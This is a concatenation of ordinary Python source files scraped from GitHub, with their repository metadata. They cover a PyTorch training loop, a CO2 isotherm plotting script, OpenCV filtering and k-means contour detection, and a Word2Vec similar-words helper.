splits=('val'), **vars(args))
trainer.test(val_loader, now_epoch)
return
elif args.evaluate == 'test':
_, _, test_loader = getDataloaders(
splits=('test'), **vars(args))
trainer.test(test_loader, now_epoch, write=True)
return
else:
train_loader, val_loader, _ = getDataloaders(
splits=('train', 'val'), **vars(args))
# set up logging
global log_print, f_log
f_log = open(os.path.join(args.save, 'log.txt'), 'w')
def log_print(*args):
print(*args)
print(*args, file=f_log)
log_print('args:')
log_print(args)
print('model:', file=f_log)
print(model, file=f_log)
log_print('# of params:',
str(sum([p.numel() for p in model.parameters()])))
f_log.flush()
f_log.close()
torch.save(args, os.path.join(args.save, 'args.pth'))
scores = ['epoch\tlr\ttrain_loss\tval_loss\ttrain_err1'
'\tval_err1\ttrain_err5\tval_err5']
if args.tensorboard:
writer = SummaryWriter(os.path.join(args.save, 'log_dir'))
for epoch in range(args.start_epoch, args.epochs + 1):
# simulate 10 fold validation
if epoch % (args.epochs / 10) == 0:
args.seed += 5
train_loader, val_loader, _ = getDataloaders(
splits=('train', 'val'), **vars(args))
# train for one epoch
train_loss, train_err1, train_err5, lr = trainer.train(
train_loader, epoch)
# evaluate on validation set
val_loss, val_err1, val_err5 = trainer.test(val_loader, epoch)
if args.tensorboard:
writer.add_scalar('Lr', lr, epoch)
writer.add_scalars('Err/err1', {'train_err1': train_err1,
'val_err1': val_err1}, epoch)
writer.add_scalars('Err/err5', {'train_err5': train_err5,
'val_err5': val_err5}, epoch)
writer.add_scalars('Loss', {'train_loss': train_loss,
'val_loss': val_loss}, epoch)
# save scores to a tsv file, rewrite the whole file to prevent
# accidental deletion
scores.append(('{}\t{}' + '\t{:.4f}' * 6)
.format(epoch, lr, train_loss, val_loss,
train_err1, val_err1, train_err5, val_err5))
with open(os.path.join(args.save, 'scores.tsv'), 'w') as f:
print('\n'.join(scores), file=f)
# remember best err@1 and save checkpoint
is_best = val_err1 < best_err1
if is_best:
best_err1 = val_err1
best_epoch = epoch
print(Fore.GREEN + 'Best var_err1 {} @ ep{}'.format(best_err1, best_epoch) +
Fore.RESET)
# test_loss, test_err1, test_err1 = validate(
# test_loader, model, criterion, epoch, True)
# save test
save_checkpoint({
'args': args,
'epoch': epoch,
'best_epoch': best_epoch,
'arch': args.arch,
'model_state_dict': model.module.state_dict() if torch.cuda.device_count() > 1 else model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'best_err1': best_err1}, is_best, args.save)
if not is_best and epoch - best_epoch >= args.patience > 0:
break
with open(os.path.join(args.save, 'scores.tsv'), 'a') as f:
print('Best val_err1: {:.4f} at epoch {}'.format(best_err1, best_epoch), file=f)
if __name__ == '__main__':
main()
| KoapT/img_classification_pytorch | main.py | main.py | py | 7,409 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.cuda.is_available",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "torch.device",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "args.arg_parser.... |
12760265976 | import numpy as np
import matplotlib.pyplot as plt
sp_LL=np.loadtxt('spline_LL.txt')
sp_LH=np.loadtxt('spline_LH.txt')
sp_HT=np.loadtxt('spline_HT.txt')
sp_R=np.loadtxt('spline_R.txt')
##
AA=np.loadtxt('HT_p_T_c')
BB=np.loadtxt('LH_p_T_c')
CC=np.loadtxt('R_p_T_c')
DD=np.loadtxt('LL_p_T_c')
EE=np.loadtxt('TP_T-x-Perr-p-u-v.txt')
###%%% Top %%%
#Top = np.zeros((10,2))
#Top[:,0] = np.linspace(0.0088,0.1706,num=10);
#Top[:,1] = 68569;
u_HT_A = AA[:,0]
v_HT_A = AA[:,1]
#p_HT_A = AA[:,2]
T_HT_A = AA[:,3]
t_HT_A = AA[:,3]
u_LH_B = BB[:,0]
v_LH_B = BB[:,1]
#p_LH_B = BB[:,2]
T_LH_B = BB[:,3];
u_R_C = CC[:,0];
v_R_C = CC[:,1];
#p_R_C = CC(:,3);
T_R_C = CC[:,3];
u_LL_D = DD[:,0];
v_LL_D = DD[:,1];
#p_LL_D = DD(:,3);
T_LL_D = DD[:,3];
u_TP_E = EE[:,4]
v_TP_E = EE[:,5]
#p_TP_E = EE[:,3]
T_TP_E = EE[:,0]
###########################isobar single phase 8,5,2,1######################################
u_HT_isoT400 = []
v_HT_isoT400 = []
u_HT_isoT350 = []
v_HT_isoT350 = []
u_HT_isoT300 = []
v_HT_isoT300 = []
u_HT_isoT230 = []
v_HT_isoT230 = []
u_HT_isoT250 = []
v_HT_isoT250 = []
#
u_LH_isoT400 = []
v_LH_isoT400 = []
u_LH_isoT350 = []
v_LH_isoT350 = []
u_LH_isoT300 = []
v_LH_isoT300 = []
#
u_TP_isoT2166 = []
v_TP_isoT2166 = []
u_TP_isoT230 = []
v_TP_isoT230 = []
u_TP_isoT250 = []
v_TP_isoT250 = []
u_TP_isoT300 = []
v_TP_isoT300 = []
#
u_R_isoT230 = []
v_R_isoT230 = []
#
u_LL_isoT350 = []
v_LL_isoT350 = []
u_LL_isoT300 = []
v_LL_isoT300 = []
u_LL_isoT250 = []
v_LL_isoT250 = []
u_LL_isoT230 = []
v_LL_isoT230 = []
#
for i in range(len(u_HT_A)):
if T_HT_A[i] <=6.03e2 and T_HT_A[i]>=5.99e2:
u_HT_isoT400.append(u_HT_A[i]/1000)
v_HT_isoT400.append(v_HT_A[i])
if T_HT_A[i] <=3.51e2 and T_HT_A[i]>=3.48e2:
u_HT_isoT350.append(u_HT_A[i]/1000)
v_HT_isoT350.append(v_HT_A[i])
if T_HT_A[i] <=3.01e2 and T_HT_A[i]>=2.95e2:
u_HT_isoT300.append(u_HT_A[i]/1000)
v_HT_isoT300.append(v_HT_A[i])
if T_HT_A[i] <=2.31e2 and T_HT_A[i]>=2.21e2:
u_HT_isoT230.append(u_HT_A[i]/1000)
v_HT_isoT230.append(v_HT_A[i])
if T_HT_A[i] <=2.51e2 and T_HT_A[i]>=2.45e2:
u_HT_isoT250.append(u_HT_A[i]/1000)
v_HT_isoT250.append(v_HT_A[i])
#
for i in range(len(u_LH_B)):
# if T_LH_B[i] <=4.01e2 and T_LH_B[i]>=3.99e2:
# u_LH_isoT400.append(u_LH_B[i]/1000)
# v_LH_isoT400.append(v_LH_B[i])
if T_LH_B[i] <=3.51e2 and T_LH_B[i]>=3.497e2:
u_LH_isoT350.append(u_LH_B[i]/1000)
v_LH_isoT350.append(v_LH_B[i])
if T_LH_B[i] <=3.01e2 and T_LH_B[i]>=2.999e2:
u_LH_isoT300.append(u_LH_B[i]/1000)
v_LH_isoT300.append(v_LH_B[i])
#############################isobar two-phase####################################
for i in range(len(u_TP_E)):
if T_TP_E[i] <=2.167e2 and T_TP_E[i]>=2.164e2:
# print(T_TP_E[i])
u_TP_isoT2166.append(u_TP_E[i]/1000)
v_TP_isoT2166.append(v_TP_E[i])
if T_TP_E[i] <=2.3001e2 and T_TP_E[i]>=2.298e2:
u_TP_isoT230.append(u_TP_E[i]/1000)
v_TP_isoT230.append(v_TP_E[i])
if T_TP_E[i] <=2.5001e2 and T_TP_E[i]>=2.499e2:
u_TP_isoT250.append(u_TP_E[i]/1000)
v_TP_isoT250.append(v_TP_E[i])
if T_TP_E[i] <=3.001e2 and T_TP_E[i]>=2.999e2:
u_TP_isoT300.append(u_TP_E[i]/1000)
v_TP_isoT300.append(v_TP_E[i])
#################################R#########################################
for i in range(len(u_R_C)):
if T_R_C[i] <=2.301e2 and T_R_C[i]>=2.299e2:
u_R_isoT230.append(u_R_C[i]/1000)
v_R_isoT230.append(v_R_C[i])
#########################################################################
for i in range(len(u_LL_D)):
if T_LL_D[i] <=2.301e2 and T_LL_D[i]>=2.299e2:
u_LL_isoT230.append(u_LL_D[i]/1000)
v_LL_isoT230.append(v_LL_D[i])
if T_LL_D[i] <=2.5001e2 and T_LL_D[i]>=2.499e2:
u_LL_isoT250.append(u_LL_D[i]/1000)
v_LL_isoT250.append(v_LL_D[i])
if T_LL_D[i] <=3.001e2 and T_LL_D[i]>=2.999e2:
u_LL_isoT300.append(u_LL_D[i]/1000)
v_LL_isoT300.append(v_LL_D[i])
if T_LL_D[i] <=3.51e2 and T_LL_D[i]>=3.497e2:
u_LL_isoT350.append(u_LL_D[i]/1000)
v_LL_isoT350.append(v_LL_D[i])
########################################################################
plt.figure(figsize=(9,4))
#
plt.semilogx(sp_R[:,0],sp_R[:,2]/1e3,color='r',linewidth=2)
plt.semilogx(sp_R[:,1],sp_R[:,2]/1e3,color='k',linewidth=2)
plt.semilogx(sp_HT[:,0],sp_HT[:,2]/1e3,linestyle='--',color='k',linewidth=2)
plt.semilogx(sp_HT[:,1],sp_HT[:,2]/1e3,linestyle='--',color='k',linewidth=2)
plt.semilogx(sp_LH[:,0],sp_LH[:,2]/1e3,color='r',linewidth=2)
plt.semilogx(sp_LH[:,1],sp_LH[:,2]/1e3,linestyle='--',color='k',linewidth=2)
plt.semilogx(sp_LL[:,0],sp_LL[:,2]/1e3,linestyle='-',color='b',linewidth=2)
plt.semilogx(sp_LL[:,1],sp_LL[:,2]/1e3,linestyle='--',color='k',linewidth=2)
###############################################################################
plt.semilogx(v_HT_isoT400,u_HT_isoT400,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT350,u_HT_isoT350,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT300,u_HT_isoT300,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT250,u_HT_isoT250,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT230,u_HT_isoT230,color='k',linewidth=2,linestyle=':')
#
plt.semilogx(v_LH_isoT400,u_LH_isoT400,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LH_isoT350,u_LH_isoT350,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LH_isoT300,u_LH_isoT300,color='k',linewidth=2,linestyle=':')
#
plt.semilogx(v_R_isoT230,u_R_isoT230,color='k',linewidth=2,linestyle=':')
#
plt.semilogx(v_LL_isoT350,u_LL_isoT350,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LL_isoT300,u_LL_isoT300,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LL_isoT250,u_LL_isoT250,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LL_isoT230,u_LL_isoT230,color='k',linewidth=2,linestyle=':')
#########################TWO-PHASE########################################
plt.semilogx(v_TP_isoT2166,u_TP_isoT2166,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_TP_isoT230,u_TP_isoT230,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_TP_isoT250,u_TP_isoT250,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_TP_isoT300,u_TP_isoT300,color='k',linewidth=2,linestyle=':')
#####control des labels
ax = plt.gca()
#ax.set_xlim([0.015, 1e-1])
ax.set_ylim([-4.5e2, 3e2])
#plt.title('Isothermal curves',fontsize=17)
plt.ylabel('Internal Energy, e $[kJkg^{-1}]$',fontsize=15,position=(0,0.5),rotation = "vertical")
plt.xlabel('Specific Volume, v $[m^{-3}kg]$',fontsize=15,rotation = "horizontal")
plt.xticks(size = 12)
plt.yticks(size = 12)
plt.grid(True)
#plt.axis([-4,4,-0.3,1.5])
#plt.xlabel('X', color='C1')
#plt.ylabel('X', color='0.5') # grayscale color
#ax.xaxis.set_label_coords(0.5,-0.05)
#ax.yaxis.set_label_coords(-0.08,0.5)
#####################################
ax.text(2.0e-2,200, '$600K$', fontsize=10)
ax.text(2.1e-2,-25, '$350K$', fontsize=10)
ax.text(2.8e-3,-200, '$300K$', fontsize=10)
ax.text(0.9e-2,-210, '$250K$', fontsize=10)
ax.text(2.0e-2,-210, '$230K$', fontsize=10)
ax.text(3.3e-2,-210, '$216.6K$', fontsize=10)
#############################################################################
plt.tight_layout()
plt.savefig("isotherm.pdf")
plt.show()
| yufang67/CO2-look-up-table | program/isotherm.py | isotherm.py | py | 7,331 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "numpy.loadtxt",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_numb... |
3859314216 | import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../Images/abc.png')
kernel = np.ones((9, 9), np.float32) / 10
print(kernel)
dst = cv2.filter2D(img, -1, kernel)
cv2.imshow("imange",dst)
cv2.waitKey(0)
cv2.destroyAllWindows() | trunghopro098/Image-Processing | ProcessImg/Filter2D.py | Filter2D.py | py | 263 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "cv2.filter2D",
"line_number... |
21253725938 | from objdetection1 import *
import cv2 as cv
import numpy as np
from PIL import Image
import random
import math
def make_cluster(img):
Z = img.reshape((-1,3))
# convert to np.float32
Z = np.float32(Z)
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = 4
ret,label,center=cv.kmeans(Z,K,None,criteria,10,cv.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
center[0] = (0,0,0)
center[1] = (200,200,200)
# center[2] = (100,0,0)
# center[3] = (0,100,0)
# center[0] = (0,0,100)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
# cv.imshow('res2',res2)
return res2
def createCandidatePositions(img):
candidates = []
bboxes = []
# convert image to grayscale image
gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
# for i in range(10):
# cv.GaussianBlur(gray_image,(5,5),0)
kernelClose = np.ones((50,50),np.uint8)
kernelErode = np.ones((20,20),np.uint8)
# kernelClose = np.ones((img.shape[1]//500,img.shape[0]//500),np.uint8)
# kernelErode = np.ones((img.shape[1]//300,img.shape[1]//300),np.uint8)
closing = cv.morphologyEx(gray_image, cv.MORPH_CLOSE, kernelClose)
closing = cv.morphologyEx(closing, cv.MORPH_ERODE, kernelErode)
closing = make_cluster(closing)
edges = cv.Canny(closing,400,425,apertureSize = 3)
# cv.imshow('res2',edges)
# calculate moments of binary image
# find contours in the binary image
contours, hierarchy = cv.findContours(edges,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)
# cv.drawContours(img, contours, -1, (255,0,0), 3)
for c in contours:
x,y,w,h = cv.boundingRect(c)
cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)
candidates.append(img[y:y+h,x:x+w])
bboxes.append((x,y,(x+w),(y+h)))
# calculate moments for each contour
M = cv.moments(c)
area = cv.contourArea(c)
# cv.imshow('aids', img)
# cv.waitKey(0)
# cv.destroyAllWindows()
return np.array(candidates), np.array(bboxes)
| DvnGBulletZz/Computer_Vision_Kenan | Eind_Opdracht/clustering.py | clustering.py | py | 2,219 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.float32",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.TERM_CRITERIA_EPS",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "cv2.TERM_CRITERIA_MAX_ITER",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name... |
31875266103 | # from .word2vec_functions.text_processing_functions import *
from .word2vec_functions.word2vec_companion import similar_words
from gensim.models import Word2Vec
import json
BASE_PATH = 'w2v/word2vec_functions/'
def load_filters():
with open(BASE_PATH + 'Raw Data/test_data.json', 'r') as file:
test_data = json.load(file)
# abstract = test_data['test_abstract']
# paper = test_data['test_paper']
sweet_words = test_data['sweet_words']
sweet_dict = test_data['sweet_dict']
sweet_dict['all'] = sweet_words
instrument_types = test_data['instrument_types']
filters = sweet_dict
filters['instruments'] = instrument_types
# filters = {'instruments': instrument_types,
# 'all': sweet_dict}
return filters
def load_models():
model = Word2Vec.load(BASE_PATH + 'Trained Models/model_e300_s150_w10_m3.model')
tuple_model = Word2Vec.load(BASE_PATH + 'Trained Models/TupleExtractions_e300_s150_w10_m3.model')
models = {'traditional': model,
'tuple': tuple_model}
return models
def load_translations():
with open(BASE_PATH + 'Processed Training Data/papers_translations.json', 'r') as file:
translations = json.load(file)
return translations
def similar_word_list_wrapper(positive_words, negative_words, filter_vocab):
filters = load_filters()
models = load_models()
translations = load_translations()
model = models['traditional']
print('positive words', positive_words)
print('negative words', negative_words)
print(filter_vocab)
similar_word_list = similar_words(positive_words, negative_words, translations, model,
verbose = False,
words_returned = 20,
limited_vocabulary = filter_vocab)
return similar_word_list
| CarsonDavis/InteractiveWord2VecWebsite | w2v/utils.py | utils.py | py | 1,911 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "gensim.models.Word2Vec.load",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "gensim.models.Word2Vec",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "gensim.m... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.